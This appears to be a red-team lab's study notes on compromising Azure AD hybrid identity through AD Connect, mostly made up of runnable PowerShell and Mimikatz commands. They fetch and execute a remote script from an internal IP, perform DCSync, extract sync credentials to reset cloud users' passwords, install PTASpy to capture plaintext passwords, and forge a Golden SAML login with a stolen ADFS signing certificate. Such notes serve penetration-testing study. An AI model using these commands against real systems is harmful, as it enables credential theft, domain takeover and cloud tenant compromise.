Hybrid Identities

• use on-prem identities to access azure applications

  • Azure AD-connect
    • Password Hash Sync
    • Pass-Through Authentication
    • Federation

• hybrid identity on-prem to cloud

  • on prem: MSOL_installationidentifier is created in AD
  • any persistence mechanism for on-prem that provides us either DA on-prem or local-admin on azuread connect server will allow to get GA on Azure AD
    • PHS: extract the credentials
    • PTA: install the agent
    • Federation: extract the certificate from ADFS

Find the Computer Running ADConnect

Find out where AD-Connect is running:

PS> Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Server techcorp.local -Properties * | select SamAccountName,Description | fl
# in the description should be the computer name

on the ad connect computer:

PS> echo F | xcopy C:\AD\Tools\InviShell\InShellProf.dll \\us-adconnect\C$\Users\helpdeskadmin\Downloads\InShellProf.dll /Y
PS> echo F | xcopy C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat \\us-adconnect\C$\Users\helpdeskadmin\Downloads\RunWithRegistryNonAdmin.bat /Y
PS> winrs -r:us-adconnect cmd
PS> cd C:\Users\helpdeskadmin\Downloads
PS> RunWithRegistryNonAdmin.bat
PS> iex (New-Object Net.WebClient).DownloadString('http://192.168.100.21/adconnect.ps1')
PS> ADconnect

use the following from an admin-shell:

PS> runas /user:techcorp.local\MSOL_16fb75d0227d /netonly cmd
PS> C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:techcorp\administrator /domain:techcorp.local" "exit"

or the following from an non-admin shell:

PS> runas /user:techcorp.local\MSOL_16fb75d0227d /netonly cmd
PS> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
PS> . C:\AD\Tools\Invoke-Mimi.ps1
PS> Invoke-Mimi -Command '"lsadump::dcsync /user:techcorp\administrator /domain:techcorp.local"'

Password Hash Sync (PHS)

• sync a hash of password-hash
• expiry date is not synced
• on-prem MSOL_ user: can dcsync AD
• azure: sync_onprem_installationid
  • can reset password of any azure user
• password for both are stored in plaintext on the on-prem sqlserver making that a high-value target

Enumerate

PS> Get-ADUser -filter "samAccountName like 'MSOL_*'" -Properties * | select SamAccountName, Description | fl
PS> Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"}

Abuse

PS> Get-AADIntSyncCredentials
 
# do dcsync
PS> runas /netonly /user:defeng.corp\MSOL_782bef6aa0a9 cmd Invoke-Mimikatz -Command ..

on prem to cloud

• request AADGraph token
• with that we can reset any user password
• get cloud anchor user_<objectid>

Get-AADIntSyncCredentials
 
# now we have the sync credentials!
$passwd = ConvertTo-SecureString 'password' -AsPlainText -Force
$creds = New-ObjectSystem.Management.Automation.PSCredential ("[email protected]", $passwd)
Get-AADIntAccessTokenForAADGraph -Credentials $creds –SaveToCache
 
# get the imutableid
Get-AADIntUser -UserPrincipalName [email protected] | select ImmutableId
 
# reset the onpremadmin user's password
Set-AADIntUserPassword -SourceAnchor "E2gG19HA4EaDe0+3LkcS5g==" -Password "SuperSecretpass#12321" –Verbose

Pass-through-Authentication (PTA)

• usernames are synced, but authentication is forwarded to on-prem AD
• for enforcing on-prem password policies
• authentication agent on-prem
  • shared secret between Azure AD and on-prem agent

# check if ad synchronization is configured
Get-ADSyncConnector
Get-Command -Module PassthroughAuthPSModule # check if PtA is configured
 
Import-Module C:\Users\adconnectadmin\Documents\AADInternals\AADInternals.psd1
Install-AADIntPTASpy
 
# get some plaintext passwords
Get-AADIntPTASpyLog -DecodePasswords

on-prem to cloud

You can also install your own adsync agent and use it to authorize any authentication → skeleton key attack.

Federation

• using the SAML2 protocol

• all authentication occurs on-prem

• can access cloud applications by using their on-prem credentials

• ImmutableID is stored on-prem in ms-DS-consistencyGuid

• if IdP is compromised we can create SAML certificate for any user → goldenSAML Attack

Import-Module C:\Users\adconnectadmin\Documents\AADInternals\AADInternals.psd1
 
# export the token signing certificate
Export-AADIntADFSSigningCertificate

on the attacker-vm

# get immutableID of the user we want to compromise
Import-Module C:\AzAD\Tools\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\AzAD\Tools\ADModule\ActiveDirectory\ActiveDirectory.psd1
[System.Convert]::ToBase64String((Get-ADUser -Identity onpremuser -Server 172.16.4.1 -Credential $creds | select -ExpandProperty ObjectGUID).tobytearray())

back on the server:

Open-AADIntOffice365Portal -ImmutableID v1pOC7Pz8kaT6JWtThJKRQ== -Issuer http://deffin.com/adfs/services/trust -PfxFileName C:\users\adfsadmin\Documents\ADFSSigningCertificate.pfx -Verbose
 
# open the html file with chrome to access the deffin.com tenant

Seamless SSO

• supported by PHS and PTA
• computer account AZUREADSSOACC in on-prem AD directory
  • kerberos decyption key is shared with azure AD
  • azure AD exposes an endpint (https://autologon.microsoftazureread-sso.com) that accepts kerberos tickets
    • we can create silvertickets if we compromise the kerberos key